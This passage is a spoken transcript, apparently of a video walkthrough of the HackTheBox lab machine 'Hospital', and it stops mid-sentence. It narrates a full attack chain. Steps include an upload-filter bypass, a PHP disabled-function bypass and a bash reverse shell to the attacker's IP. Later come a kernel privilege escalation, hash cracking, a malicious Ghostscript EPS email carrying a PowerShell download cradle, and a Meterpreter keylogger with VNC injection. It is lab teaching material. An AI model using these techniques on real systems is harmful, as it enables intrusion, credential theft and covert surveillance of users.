What's going on YouTube? This is IPSec, doing Hospital from HackTheBox, which starts out with hacking a file upload form. You can use this to get code execution. There's a few tricks, but once you do, you're on a Linux container and you look at the kernel, it is a little bit out of date from like February 2023, so it's over a year old. There are a few intended 2023 CVEs that you can use to PRIVESC, but I'm going to end up showing a very recent one. I think it came out like a month ago, the NetFilter one in 2024, because it's just more relevant today. We'll use that to PRIVESC. We get root on the container. We can crack some hashes that enables us to log into a doctor's email, discover someone's using GhostScript with EPS files to do some conversion. There is a vulnerability there, so you can email them a malicious EPS document, gain shell on the Windows box. And from there, there's two different PRIVESCs. The more interesting one is uploading a keylogger and then just logging the keys and discovering they type a password in. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it hospital, then the IP address of 10.10.11.241. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. The first thing we see is SSH on port 22, and its banner tells us it's an Ubuntu server. Then the next thing we see is DNS on port 53, and its banner says it's simple DNS plus. And then we have a bunch of Windows things related to Active Directory. So is this going to be a Ubuntu machine or a Windows machine? At this point, I don't really know. I guess the HackTheBox platform does tell me this is Windows, but I don't know which IP is holding 10.10.11.241. So right away, I'm just going to go ahead and add the host names to my host file before I forget the step. And then we're going to do a little bit of network analysis to find out which host is 10.10.11.241, because it looks like there's two. So hospital.htb I got off of the LDAP certificate, and we also have dc.hospital.htb. So let's go ahead and add this. And then real quick, while we're in nmap, might as well look through all the ports. So we know we got an SSH server. We have Active Directory. There's nothing on port 80, but 443 does have Apache, and it's telling us it is running on Windows 64, and it has PHP enabled. Most likely, this is a program called XAMPP, XAMPP. That's the most common way to get like Apache and PHP running on Windows. Then we have SMB on 445. Looks like a lot of LDAP stuff there. 3389, so we got remote desktop open to us. And then 8080 has a second web server. And this one is Apache again, but it's running Ubuntu. So we have quite a few ports that have both Ubuntu and Windows. So the easiest way to look at this is just going through the TTL. That is the time to live, right? We can just ping 10.10.11.241, and we see the TTL of that is 127. That immediately tells us the host of this computer is Windows, because Windows defaults to 128 as the TTL, and it decrements 1 every time it hits a router. There's the VPN server between me and this Windows box, so that's why it decremented to 127. However, we can go one step further and just look at the TTL on a network connection, right? So normally I use Wireshark in my videos to show this, but since we've shown it before, let's just do TCP dump. So we're going to do TCP dump on my ton0 interface. So that's the VPN interface. You need to add -v for verbose to show the TTL. By default, TTL is not shown unless that. Whenever doing TCP dump, I like -n to hide DNS. And then to get rid of some fluff, I'm going to say IP source is equal to 10.10.11.241, because we only want to see packets where the source address is coming from this guy. If we didn't have this, we would see connections, me going to the server and the server coming back to me, right? So let's run this TCP dump command. And then we just to make a connection to a port. So I'm just going to use netcat. You can use curl. You can use anything you want. So we'll do netcat 10.10.11.241. And then we can say port 22. And we see the TTL is 62. Linux by default sets it at 64, and it's got 2 hops. It's got a hop through the Windows, which is acting as a router. It's probably running Hyper-V, and then it has to hop through the VPN router. So it's 2 hops to me. And what this is telling me is Hyper-V's at play. If it was Docker, Docker doesn't decrement the TTL. I don't think the Windows subsystem for Linux decrements TTL as well. Maybe it does. I'm not positive. But this is what network forensics can kind of tell you. If we go to like 443, that was the Windows port, you see the TTL is 127. So now we know the external facing thing, the main host, is going to be a Windows box. Doesn't help us all that much, but any type of recon we can get early on definitely is beneficial. So let's just go take a look at HTTPS and we'll see what this web server is. We just want to accept the risk. And this is loading a RoundCube instance. And we don't know any username or password, so this doesn't really help us too much. We could potentially try to find the version. I think there is a way you can figure out the RoundCube version. Not positive. If we just do GitHub RoundCube, maybe it's like readme.md or something. Let's see. Readme.md. Does this exist? Forbidden. So there probably is a way to enumerate the RoundCube version, but it's not that beneficial. Let's go take a look at what's on port 8080. We don't want to do HTTPS, I don't think. And we just get a login page. We could test like credentials if we do admin password to see if this works. We get invalid username and password. I was hoping it would tell us if the username existed or not. Let's try making one. Let's create the username admin and do password. And we see username's already taken. So we know the username admin exists on this website. There is a way to enumerate valid users. Let's now just create the username IPSEC and then log in. So if we do IPSEC password, we get logged in. And it looks like just a simple file upload. And I noticed this is running PHP. So let's try uploading a PHP file. Or it's telling us what type of file does it want us to upload first? Image files. So let's grab an image file and then just see what a legit upload looks like. So let's do locate PNG. I'm just going to grab a random PNG here, copy it, and then we can go to browse. Let's go HTTP hospital and then upload this. And I'm going to want to tell my burp suite I want to intercept this request and then forward it along. And then let's forward this request. And we saw it redirecting us to success.php. We don't see where the upload is stored. If we try like guessing a directory, maybe it's in uploads, that's a common place, we get a forbidden. So we know this probably exists. If I do a directory that doesn't, we get a not found. So we know uploads does exist. Now we just have to guess at the file name. The first thing you always do is just guess at the name you uploaded. So like buttons.png is what we uploaded. So if we try this, we do get the image we uploaded. If this didn't exist, I try like the md5sum.png, just the md5sum. I try just things that developers do to rename files. But since we know we just can upload a straight file, let's go over to the repeater tab where we sent that request to. I'm going to change the PNG to be PHP. And we get a /failed.php. And if I try buttons.php, we get a not found. So we can't upload that. If I did like PHP 3, 5, these are all going to /failed. If I do like 99, we get success. So we know this filter is a blacklist, right? Because an unknown extension, it works. Something else you could do is you could send this over to FUF and then guess that way. Let's try that because that's always a fun exercise. I'm going to copy to file and then going to make this upload.request. We can save it. And then let's just make sure it looks like as we want. That looks fun. I saw a bunch of gibberish, but that's just the image, right? But this looks like a normal upload. So let's edit this. We're going to change the extension right here. We're going to put fuzz, and then we can do fuff dash request upload.php dash request dash proto HTTP. By default, it's going to do HTTPS, so you want to just say HTTP. And then we do the word list. So we'll do opt, and I'm going to use, let's see, opt sec list, fuzzing, and then there's extensions. So let's do opt seclist fuzzing and then extensions. extension star, and I just want to get a small word list to start. Let's see, for I in, do cat I wc-l. Permission denied. We want to do ls. There we go. We also need to say echo-n I. There's probably a better way to do this. I bet if I did wc-l extension like that, we gotta go in that directory. I bet this would also do what I just did. Eventually I got there, right? So that's probably too many. This seems like a good number I'd want to do. So I'm just going to copy that. Let's look at that file real quick. That looks fine. Let's do PHP 4. Oh, PHP 4 is not there. That's not what I want. Does Boom have PHP 4? That's just like a common extension I want. That has % something. That's like format strings. Let's just do most common. So picking the word list is always something that takes a little bit of time. This looks good. So let's do extensions, most common fuzz, and then we send the request off. And we can see every request right now looks the same. We want to be able to match for when it contains success, but I don't think the match regular expression in FUF actually looks at the headers. So if I do success, let's see, it is all lowercase. Oh, it does look at headers, I think. So we can see all these extensions worked. So we could do PDF, CFM, CFG, docx, doctar, PHTM. Maybe like PHTM will get code execution, so we can try that. So let's do erase all of the binary data. And then we can do PHP system who am I? Like that. And we want to make this file PHTM. Curl, it got the redirect. So if we go to this, PHTM, we just get the file. So that did not convert it to PHP. One extension that I don't think's in that word list, we can look for it. Let's see, we did it down here. Let's go back to this. We can grep phar, P-H-A-R. And that doesn't look like it's in any of those. But phar is another good PHP extension, so let's try doing that one. I'm sure if you did blog posts and just ways to like valid PHP extensions, this is one of the more common ones. It's just one of the newer ones. And now let's go back to this page. We need to change the extension to phar. Buttons.phar does not exist. It said upload success. That is bizarre. Okay. But let's do test.phar. Something is behaving really weird. So we get the file. We do view source. Oh, I'm in view source. So I don't know why buttons wasn't working, but test is kind of. We don't see any output here. And that is like really, really odd. Let's just do this in curl so we can, actually we can do it in Burp Suite. Let's just do intercept this request. Intercept, send. We just have a blank response. If we do hex, I think it sends nothing, maybe. Maybe it sends 8.9. I don't know exactly what 8.9 translates to. I want to try buttons real quick. So buttons is working here. It must be like a web browser caching thing. Or maybe I like erased the N. Maybe that's what was happening. But we're not using test.phar. We have no output. And what this tells me is there's something blocking our PHP code. because I should either see the shell I uploaded, like this string, or I should see the output of who am I. Since I see neither of those, I know it executed my PHP and decided to do nothing. We could change this over to an echo command. And if we do that, we see now it echoes the thing. It doesn't say like echo space who am I, so we have code execution. So what we want to do here is do a PHP info. So if we do PHP info, and then let's just go back to test.phar. We can turn intercept off as well. We will have the PHP info thing, and the thing I'm looking for is disabled functions. And we can see they have disabled a lot of functions here. And like the shell exec system, so we can't use system, we can't use shell exec, we can't use just exec. So this is why the system command failed. We could probably just like manually read files, but we could look for any function that's dangerous that isn't disabled. And if we use like pony shell, I think this is it. I'm not actually going to use this. I'll just talk about it real quick. This is a good single file PHP shell that automatically does a lot of the bypassing for you, but I want to show it, right? If we go to shell.php, we can see before it tries to execute command, it's looking if these functions exist, right? We got system, obstart, obget, and if those exist, it's going to build a gadget to use these functions to execute. If we look at what all function exist does, it's up here. All it's going to do is say if function exists, right? So that's all this is doing. It's automating the way to do these type of ways to get code execution. But if we went to ipsec.rocks, I want to say like PHP disable. I used a thing called dfunc bypass in this up-down video. We're going to redo everything we did in that video. So if anything doesn't make sense, go back to that one. I think if I do dfunc bypass GitHub, this will bring up the page I want. And the downside with this is it's going to be in Python 2, and I hate using Python 2. So we're just going to convert it to use PHP, which again, I did in that previous video. It doesn't take much time. The way they intend this script to be ran is you grab all the disabled functions from PHP, copy and paste it into this Python, and then work it that way. What I'm going to do is just do it all in PHP. So I'm going to grab all their dangerous functions. So if we like Google any of these, we'll find a way to execute code. So let's do v dangerous.php, and I'm going to say dangerous functions is equal to array like that. And then let's make this PHP. Okay. And then we want to just do a loop. So is it for each dangerous? I forget exactly how to do PHP for each loop. This is embarrassing. I think it's like for each dangerous function in something. Let's see. For each blank as value. Okay. So dangerous functions as f. There we go. And then we just want to say if, was it function exists? And then f. Then we can say echo. Let's see. We want to say f. Then period is a concatenation. Exists. And then let's do a line break, enter. I don't think I need the parentheses there. It's been so long since I've done anything in PHP. Let's try this. Probably should have closed that PHP tag, but oh well. It does not matter. So we're going to put this. Okay. Then I'm just going to execute this internal server error. So we screwed something up. Let's see. Dangerous function, array. I see it. We need another parenthesis there. I can just manually fix that. Let's go here. Okay. There we go. So we have a few. We have errorlog, popen, link, symlink, syslog, and mail. Popen is probably the easiest one to exploit. If we just do php popen run command, we'll probably go to like their help page that tells us how to do it. Let's see, popen manual. And let's see, we want to be able to read the output. So let's grab this. Paste this in. Okay. Hold on 1 second. I'm going to put this in. I'm going to get rid of this parenthesis. And we're going to rerun it. Okay. I was wondering if this error reporting line would have magically just put the error message in that HTTP request. Because that would come handy when you're just troubleshooting things. But I think Apache's not in developer mode or whatever it is. It's in production mode, so it strips all 500s. So here we have the script. We got a popen path to executable. So let's just do bin ls. And I always like doing full paths. Let's try it without a full path real quick when we do a popen. Oh, it still works, right? We see our 2 items. So we don't need the full path there. So we can now navigate the file system. So what I want to do is get a reverse shell. So we can do a --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. Okay. Close off the double quote. That looks good. Send it. Let's listen on 9001. And then I'm going to go over to this tab, run it. We're hung here. That's a good sign because we have a shell. And then whenever I get a shell, I always like making sure I don't hang the server completely. So I'm just going to try getting it again. So if I cancel this request, send it again. We got it. Okay. So every now and then when you get a shell, it may hang the whole web server. So I always just like testing for that because you don't want to create a outage that you don't know about, right? So let's upgrade this shell to be a proper PTY. So Python C, import PTY, PTY spawn, bin bash, close the parenthesis like that. st2y, raw minus echo, fg, enter, enter. Export term is equal to xterm. Awesome. So now we have a shell on the web server as www data. The first thing I always like doing is looking for a database. Let's see. We have uploads, login. Where's like settings.php? I guess we could cat login.php. And oh God, I hate when they like intermingle HTML and PHP. Let's see. Session start config.php. How did I miss that? It's the first one. So we have root and MySQL service. So let's do MySQL -u root -p. Okay. Show tables. Show databases. Use hospital. Show tables. Select star from users. So we have 2 hashes right here. So we could grab them. So v hashes, I'm going to call this hashes.8080, I guess. We could call it like patient upload or something like that. I always like putting the username as well. And let's see, we can grab this. Patient. Okay. So let's cat this, put it on a clipboard. And then I'm going to attempt to crack these. So we can go to the Kraken, go hashes or hashcat, hashes. I'm going to call this hospital 8080 /hashcat.bin hashes hospital 8080 word list. We don't do -w opt word list RockU. and this is probably going to fail auto detection mode, maybe. No. Oh, we have to do -- user. Let's see. And the mode is this. We're not using Forms e-commerce. It's just going to be standard bcrypt. So -m 3200. So now that the cracking is going in the background, and I don't think that's actually going to crack, but I do want to just show those steps every now and then. We want to see what else we could do on this server. If we look at the Uname output, we can see this kernel is February 3rd, 2023. And I think maybe the intended is like game overlay or another like old PRIVESC, but I'm going to do a unintended PRIVESC just because it's another old kernel. I don't see the purpose of showing you a kernel PRIVESC that's over a year out of date. I'd rather show you one that's like a month out of date, right? So let's go over to our web browser and look for one. I wonder if I just do uname-a again real quick. Would it just come up if I Googled this kernel? Let's see. Kernel exploit this. Let's make sure Burp Suite is indeed off. I don't know if it will. Let's see. This is the one I think that's intended. This inactive one, which I think is game overlay. But I don't think this is coming up. So let's see. I'm going to try Linux kernel PRIVESC. And I know it's going to be a super generic result, but if we do tools, anytime, past month, and let's go to the top result. And let's see, I want to say this is good. Between version 5.14 and 6.6. That is a lot of versions, and we're 5.19. So chances are this is going to work just because we're between those two versions. So I'm going to download this. And you should always compile it yourself, but we're in a lab environment, so we don't have to. We cracked both of them. So admin password was 123456, and patient is patient. But let's do make dir dub wget. That's not what I want. Let's copy. wget this. Okay, Python 3m HTTP server. Then we can dev shm wget 10.10.14.8 8000 exploit. There's really no harm, and if this exploit was malicious, of it really affecting anything because I'm running it on a temporary computer, right? So I just want to see if the PRIVESC works and if it's stable. So let's run it, and immediately we get over to root. So this is a valid PRIVESC. This is like the NF tables PRIVESC. So if you want to go back, this is a good CVE for it, right? It affects a lot of kernels. Let's see. So from here, what can we do as root? Well, now we can read the shadow file. And let's just do cat etsy shadow grep, everything that has a $ in it. And there's two. We have root, which is this weird encryption, $y$, and then drwilliams, which is something we're used to seeing. I'm going to start this crack off, and then we're going to talk about the other one. I don't think the other one's actually supported in Hashcat yet. Maybe it is in the newest version if we updated. Let's do v hashes hospital.shadow. Paste this. Go back to a Hashcat. I probably should have done the user, but oh well. Okay, so that's cracking. So this whole $y$, this is actually yescrypt. And we see it's already cracked. So we'll go back to that cracking in a minute. But when I want to look at what encryption things are relevant, I can always use the man pages. You could go to Google, but Google actually took me longer to find than just using the man pages. Maybe ChatGPT would help me as well. But knowing how to use man pages is very important. If we look at this, we can see the description in the crypt table, and crypt is just how Linux does encryption, right? It says hashing methods are described in crypt 5. Now, a lot of people may just be confused by this, but we can just do man5 crypt, and then it talks about that. So what is that? That is a page of crypt, or a man page, right? If we look by default, we're on page 3 here. And what are those pages? Let's just do a man of man. And it tells you what each page is. 1 is for executable programs. 5 is for file formats and conventions. So that's why all the hashing conventions would be on page 5 of crypt. Library calls, which crypt is a library, essentially a DLL if you come from Windows. So that's why we default to page 3. Syscalls would be on page 2, right? So this is just how the man page is organized. So let's go to man5 crypt, and then we can see how things are set up, right? And available hashing methods. And then we have yescrypt, prefix, $y$. Here's the format, its passphrase, details about it, right? Then you got the ghost yescrypt, so if it's a GY. It talks about all of them. Scrypt is $7, bcrypt is $2, then B, or X, or A, or Y. It can be those things. So this is a great way just to familiarize yourself with exactly how hashing works, right? Because it tells you what everything is. SHA-512 crypt, the next thing after the $6 is going to be the rounds. So just a good resource in general. But let's look at what Hashcat has told us. It said the password for Dr. Williams, I think that's what it was in the shadow file, is QWE bang at pound. So Dr. Williams is right there. So this was a Windows box, right? So let's try, we can get out of Hashcat now. netexec, and then SMB, 10.10.11, 241. And then we want to do -U, Dr. Williams, -P, and copied the line break. There we go. Let's put this in quotes and send it on off. And we'll see it does authenticate. So whenever I see that, I always like just making an invalid password because I like to seeing an authenticate and a deauthenticate because sometimes Windows will tell you everything's valid. So we know that is the valid password. We can do --shares and see if there's any unique shares that Dr. Williams has access to. It does not look like it. If we do Dr. Williams, let's try like WinRM. See if that exists. We don't want to do shares with WinRM. No. Is RDP a thing? I want to say it is in netexec, right? netexec-h, FTP, LDAP, RDP. It is. It didn't give me any output. I don't exactly like that. Let's try xfree rdp /v 10.10.11.241 u Dr. Williams p. I'll put the p on standard input because I'm not positive how that works. Yes, password. And we have a connection failed. So what's next? Well, remember, there was a RoundCube instance on HTTPS. So let's go back there. 18080. Dr. Williams, put in the password, log in, and clean up some of these tabs. And we get logged into Dr. Williams' mail. And there's inbox does have one message, needle design for Darius Simeon. And let's see, project later can take, he wants a EPS file so it can be visualized with GhostScript. So I'm going to Google EPS GhostScript exploit to see if there's any way I can send him a malicious attachment. And right at the bat, we have one. So if we look at this, we have a CVE to create a malicious EPS file. So I'm going to clone this repository. Okay. And then let's see, how does he use it? It looks like there's a generate reverse shell IP. This looks like exactly what I want. So if I run this, let's change the reverse shell information. 9001, 10.10.14.8. Okay. So it generated this EPS file. So I always want to look at exactly how it works to understand the exploit. So it looks like something after stroke, maybe. I'd have to look in the CVE, but this is the payload it's using. And right away, I can see this is not going to work on Windows. This reverse shell payload is only a Unix thing. I don't see any like Win reverse shell payload. I'm going to do a grep-r on rev shell. And let's see, I only see Unix here. I was hoping to see a Win underscore. So we have to figure out a way to get a Windows reverse shell on this. So let's see. I'm going to create actually a new window just to stay organized a bit better. We can go in here. We want to create a one-liner that does code execution. So I'm going to do cp user share nashang shells invoke PowerShell TCP one line PS1. I'm going to call it shell.ps1 so I don't have to type that name again. And I don't have to do it this way. But I always like having a web server, like a web cradle, execute it. Because if I just encoded this and sent it to the server and antivirus picked it up, I wouldn't know if my code execution worked, right? So if I do a web cradle, so the server reaches back to me to download the payload, antivirus is not going to trigger that often when making an HTTP request. So that validates I have code execution. And if I don't get the shell, then I know AV probably blocked the shell or I made a typo or something like that. So that's why I like making this a two-step process instead of just doing a one-step. We can show it will probably work both ways, but I just want to kind of explain my logic as I go. So we have the shell there. Our web server is in this one. Let's just close that out so we can listen here. So now what we need to do is create a one-liner to execute that. So I'm going to do echo, then IEX, new object, net.web client, download string. And I always like doing the download string in single quotes. So HTTP 10.10.14.8, 8000 shell.ps1, like this. Awesome. And now to avoid any like quoting issues, because we got that double quote there, the single quote, I always like just base64 encoding it. And Windows likes things in UTF-16 little endian. So I'm going to do iconvert or iconv, T for target, then UTF-16 little endian. And all that does, if we pipe it over to XXD, we can see every character, it just puts it null byte afterwards because it's 16-bit encoding, right? If we remove that whole icon command, you can see it doesn't have that. But that's how PowerShell likes its base64 and everything else. So let's do a base64-w0. So now we have our web cradle command. So this is going to execute whatever's on a web server. So let's go back to this CVE. So Python 3, CVE, what is it? Generate. Then we can do payload. I'm going to do PowerShell, ENC, paste in that. And then we need file name shell.eps. We'll do shell and then extension EPS. There we go. So now we have a shell.eps. Let's move that up one directory to stay a little organized. Look at it. That is definitely our PowerShell command. Let's listen on 9001. And then go back over to RoundCube. We can reply to him. Wait for RoundCube to get the message. Intercept is off. It's just taking its time. Attach a file. Shell EPS. Here is the design spec you want. And it's going to Dr. Brown. Send it. Waiting for it to send. It's sent. So now what we want to do is wait for an HTTP request to come and see if we get the reverse shell. And waiting. It'll probably take like 60 seconds. Oh, no, we got it. It almost looks like the shell came before I saw that HTTP connection, but there we have it as Dr. Brown, right? So again, because it made this request, we know it got there, and then obviously we got the shell. But if we didn't want to stand up that web server, we didn't have to. Let's just show that real quick. Was I in www? I was. So cat shell ps1 iconv to utf 16 little endian base 64 w0. Let's just make sure this works so I'm not lying to you when I say things. Should just do like xclip to copy this, but oh well. Copy that. Run this again. I think I do Control D. No. I always forget the hotkey to delete a whole word. I thought I had it memorized, but apparently not. So we have a lot more base 64. Paste. File name shell 2. Oh, we gotta go in that directory. There we go. Let's move shell 2 up one directory. NC LVNP 9001. And we will send that message again. Actually, I'm just going to make that full screen. Waiting. And before I send it, I realize I always like using RL wrap when I do a Windows shell. So we'll attach it. We don't need to send a message, I don't think. Let's just clear that. Can exit that. Because that gives me the up and down errors when I'm in my Windows shell. So it's a big quality of life thing. So we can send that one there. And if we look, we have nothing on 8000 anymore. So there's no way for it to hit our web server. We should just magically see the shell come in. As long as this worked, I guess. And there it is. So again, you don't have to do the web cradle, but it is good practice. Anyways, now we are Dr. Brown. If we do a dir in his directory, we see there is a file called GhostScript. If I look at what GhostScript is, we can see it's running PowerShell. It looks like this may be Dr. Brown's password right here, is Chris Brown. Looking at it, it's running ghostscript.exe against every file in his downloads. So this is just automating executing that EPS file, right? Nothing too interesting here other than you could get Chris Brown's password if you wanted. We could verify that is indeed his password with netexec. So netexec smb 10.10.11.241 -u. What was the name? Dr. Brown. -p. And then after this, we can check WinRM as well to see if he has a member of remote users, right? So running this, it looks like we could use Eva WinRM if we wanted to establish a shell again as this user. We already have PowerShell, so we don't have to do that, but it is an option if we wanted to. So let's think about this, right? There's two ways we can really get to root from here. The first one's the unintended. That's going to be what I'm going to show first because it's just so much quicker, right? If we went back to our nmap, so if we go nmap hospital, look at 443, we knew Apache was listening on Windows as well. The Apache instance we had exploited initially was the one on port 8080, which is on Ubuntu. So we know the Windows server did have a web server. And I always like whenever I land on a box, especially Windows, to get code execution also as the web user because there may be like an SE impersonate privilege that you can use one of the potatoes to get admin. So let's go do a dir here. And we go in XAMPP because this is normally how Apache is installed on Windows. HTDocs is normally the like var www HTML. And here we can see PHP files install. I bet install was the file I was thinking of. What if we just did install on HTTPS? Is that blocked? After 241 / forbidden. So HE access is blocking access to this, but This is RoundCube. If we put a shell here, so let's just try echo PHP system, who am I? Like that. We probably want a, let's see, close the PHP tag, semicolon. We can call it shell.php. So if I now go over to shell.php, do you think it's going to execute? We did not. It didn't execute anything at all. And there's something at play that we kind of talked about earlier in this video. If we look at shell.php, wait, what? There we go. It just took a while for that type command to work, but it looks fine. Let's go over to curl, or better yet, let's do burp suite. So let's do proxy intercept. Yeah, let's do intercept on. Send this, go over to repeater tab, run this. This looks fine, right? But what if we go over to hex? What are we seeing? We're seeing it's UTF-16 little endian encoded because that's what PowerShell likes, right? We can see this is the P, this is H, right? And this is actually blocking the magic byte check for, where is it? Not there, not there, right here. When it's looking for the less than question mark, it's actually failing because it's not UTF-8. The care set here says UTF-8 in the response, but it's UTF-16 little endian. So to fix that, we want to do a, what was it? Out encoding? No, out file. I think we do out file dash encoding, and we can say UTF-8, and then the file name shell.php. I think that's what we did. Let's go back here, run it. That looks better. I see authority, right? So it's no longer UTF-16 little endian encoded. So we have a shell, and wow, we're system as this shell. So all we have to do here is change this up. So we have code execution. So we can say request CMD like that. And then we can change this to be a post request, CMD equals who am I. It's still not working. PHP system request. That should have worked. Type string, an array was given. What? Did I screw something up? PHP system. That is bizarre. I'm really not sure what's happening here. Oh. Let's escape this. My file was system and then CMD. It escaped this request because it thought this was a variable. At least I think that's what just happened. Let's replace these quotes. Let's do single quote here, double quotes here, single quote there. There we go. That should fix it. There we go. That was a weird issue. So now we have a shell. So let's see. Do I have, if I do a new thing, generate, is this it? Let's just go CVE. Oh, it was dub. We can say this, copy, We can say command PowerShell encoded the string. And that does not look like it worked. .exe encoded command. Let's see. Where is this erroring to? We have that. Wonder if I have to do like that no hup thing or stuff. Let's see, what begins with no? No profile. That's not just it. Non-interactive. Is my command getting terminated? I don't think so. What if my argument's just too long? Or it's that plus. That was it. So I had a plus right here in this encoded command. So I forgot to URL encode this, and that's what was causing the issue, right? If I do Control-Shift-U, you can see a plus there. There's probably a few other pluses, but that's what was breaking my base64. It was getting translated to a space, right? So always make sure you URL encode. But now on this one, we do who am I? We are system. So of course we can go users administrator, desktop, and we get the flag if we wanted to. So that's the unintended way. The intended way is much cooler. So if we looked at this box, if we do like task list, I think that's going to work, right? Is our rep just making this take a while? Maybe get process will work. So looking over to these results, we see something that sticks out right away. We have some process with 1, which indicates it's an interactive login. These are probably VMware ones, SV host, but let's see. We have Internet Explorer, was that? I saw Shell Experience, PowerShell, Search UI, LSAS. Here we go, Internet Explorer. So we see someone is logged into this box. HMail server, this is 0, so that's the non-interactive. That's just running as a service. 1 is Explorer as well. If we did QW Insta, we can see Dr. Brown is physically logged in. The state is set to active. We're ID 0. If we do, let's see, who am I? We are Dr. Brown. So it's still Dr. Brown. We're just in a non-interactive to the desktop session. If we also did, was it query user? I think that shows logged in users too. But we want to become process 1, right? Or ID 1. We shouldn't say process 1 because that's something completely different. We want to become an interactive one. And if we do, then we can run a keylogger and see what Dr. Brown is typing into the computer, or we can like set up a VNC thing, look at the desktop, things like that. So let's go take a look at exactly what Dr. Brown is doing. And the easiest way to do this is going to be through Metasploit, because we have to inject ourselves into another process, and process injection in PowerShell is just a big pain. So I'm going to be using Metasploit for this. Let's do MSF Venom -P. Don't exactly remember the flags. -L payloads to get a payload for this. Let's wait for it to list. I guess while that runs, we can say msfdb run sudo. There we go. Windows x64 meterpreter. Okay. Let's see. We just want reverse TCP. So this is going to be a stage list payload. It's going to make it a lot bigger. So we want just reverse TCP like this. MSF Venom -P. Okay. Reverse TCP. Then L host is equal to 10.10.14.8. L port is going to be, we'll do 9001 again. What is it? -F for format, exe, -O for out file, msf.exe. Did I do this right? Do we make an executable? Use multi, let's see, search handler. Use, I think it's multi-handler listener. Exploit multi-handler. It's been a while since I've touched Metasploit. Okay, show payloads. I should have done set payload. My bad. File msf.exe. We have created a 64-bit. Awesome. Set payload. Windows x64 meterpreter. Reverse TCP. Set L host ton 0. Set L port 9001. Run. Let's move msf.exe to www. Let's make sure we have a web server listing so we can download this. Let's just go over into program data because that's a good spot to write things on Windows. wget http 10.10.14.8 port 8000 msf.exe. Let's download it. Not found. Not in www. There we go. Run this. Sending the stage. We should get a call back. There we go. Session 1 has been opened. So here we are in Meterpreter. If I do BG, we can background that. I do want to interact with it. I'm not used to like the output of it actually saying the working directory here. If we do help, sweet. So I'm going to do a PS so we can list all the running processes. And then we just want to migrate into something that is interactive. Normally when doing a keylogger, you either want to go into the process you want to monitor yourself or go into explorer.exe. I'm going to choose explorer.exe. So I'm going to migrate into 2288. And again, the reason why we can do this is because, is it get UID? And there we go. Because we're Dr. Brown and we're going into another Dr. Brown process, right? So if I do migrate, we're going to go over into Explorer. And the reason why you may not want to do this is because if you crash Explorer, it makes it obvious on the desktop, but normally it just restarts. If you crash Internet Explorer, an Explorer window would just close and maybe it doesn't get noticed. But here we have it started. If I do help, there is a key scan command. So we can either send keystrokes, key events, but we can do a key scan start. So let's do key scan start. And then if we look at this, whenever we want to get what's on the keyboard or keylogger, we do a key scan dump. So if I do key scan dump, it's dumping the captured keystrokes. We don't have anything yet. So if this doesn't get anything, then I'm going to probably switch over to the Internet Explorer process. Let's see. Get PID. I am 2288. Oh, I'm in VMware Tools. I want to get in 2612, I guess. Is it parent process? PID. Okay, no. The parent of that VMware Tools process is Explorer. I am in Explorer. This is where I am. And we don't have anything. So I'm thinking maybe you actually have to be in an Explorer for this to work. Let's see. Is there a quick way to do VNC? Nope. Let's see. Search VNC. BG. Search VNC. Let's see. VNC inject. Let's just do this one. Set view only is true. That's fine. Let's see. Listen port. Set L host ton 0. I thought there'd be an argument to like use my session. It's been a while since I've done this. VNC server. What did I do? I did do inject. Maybe there's a post exploit for this. MS remote, VNC gather. Let's see. Use post Windows manage payload inject. Okay. This may be better. Has been moved. Let's just use what it's been moved to. Let's see. Set payload. This is what I want, I think. Let's see. Set payload. This. Set L host ton 0. Okay. BID. Set session. I think we're session 1, right? Sessions-L. Yep. And then we can do set PID 2288. Run. Is this going to work? We don't have VNC viewer. Sudo apt install VNC viewer. Sudo apt search VNC view. Let's see. Maybe this. Sudo apt install. Hopefully this works. Okay, we now have VNC viewer. So it's setting up all the tunnels, and we're sending the payload. We should see a VNC viewer window pop up soon, but maybe it's not. I wonder if I just set my TCP relay on ton 0. Because I think we just crashed our session. Let's see, VNC viewer 27001 5900. Oh, nope, we didn't crash it. We have it working. So this is the desktop of the server. We can see them typing things, right? So we have successfully injected VNC. So we know we're halfway there. Let's foreground this. BG. Did I kill that? Not sure if I did. So let's see. Key scan dump. Oh, it was logging. It just took a while, right? We can see them type administrator and then the best hospital, whatever, a bunch of numbers. So if we do net exec, SMB, 10, 10, 11, 241, U, administrator, -P. Get logged in, and I want to see them actually start typing. Login failure. Is there no exclamation point? Let's see. Well, I guess we can log into RoundCube as administrator and see. But I think they're about to start typing, or I was on view only. When I hit Alt, something's happening. That should not be happening. Let's see. Let's log in to RoundCube. Make sure we have the password. So that's without the exclamation point. We'll do with an exclamation point. See, let's try the very last one. Are these all the same or different? Connection to storage server failed. There we go. Let's see. What's the difference between this? TH3, B. So they're different. This was a lowercase b. So this one was the uppercase. We have it pwned. So we could use just like psexec.py, I guess, if we wanted to. 10, 10, 11, 241. Administrator at. Requesting share. And that's how to do it the intended way, right? So I hope you guys enjoyed that. I always like just snooping in on VNC sessions. Apparently this is not view only. I thought I was in view only mode, but definitely not, because you can see me interacting with the desktop here. So, yep, take care, guys. I will see you all next time. Actually, that's a lie. As soon as I stopped recording the video, we saw the scheduled task start up back again for it doing all the typing. So if you wanted to see just what it's doing, we can watch the automated script run and start typing in the password. And if you didn't want to do a keylogger and you did get this VNC session, or maybe you got Chris Brown's password and you could log in through remote desktop. I don't know if Chris Brown can. Then you could probably just click on the password field and unmask it, right? So here we see it typing administrator. The latency in this is awful. Like VNC is not a good conduit of remote administration, because you can just see how slow it is. But we can see all this stuff coming. And as soon as it attempts typing this in, I'm going to click that little I, and then that will unmask what has been typed, right? Let's see. I click this. So this is another way we could have grabbed the password. without doing a keylogger. But again, you still need get VNC up. I guess let's check Chris Brown if we can remote desktop. What was it? X-free RDP. It's not in this window. I have no idea which pane we did that in. Let's see. Where's Chris Brown's password? Dr. Brown. Oh, is this Dr. Brown's password? Yeah. Documents. Type. What's in here? Type GhostScript.bat. Let's see. Can you RDP? Dr. Brown. RDP. That just fails. X-free RDP. 10, 10, 11, 241. Dr. Brown. Password. And we can log in through RDP. So if we grab the password, then we would be able to get here and unmap. Weird. This one shows it. I don't see. Is it because I'm in RDP that I don't have access to that button? I don't think I've ever experienced that before. Let's see. X-free RDP console. Is it just like /console/admin? Let's try that. We can see typing in the password, but again, we don't have that button to unmask it. I think that's because it knows we're on remote desktop and it's like, I'm not going to give that to you, which is cool. I just didn't know it did that. And those are the things you learn when you just go the extra mile. So with that /admin flag, I do have 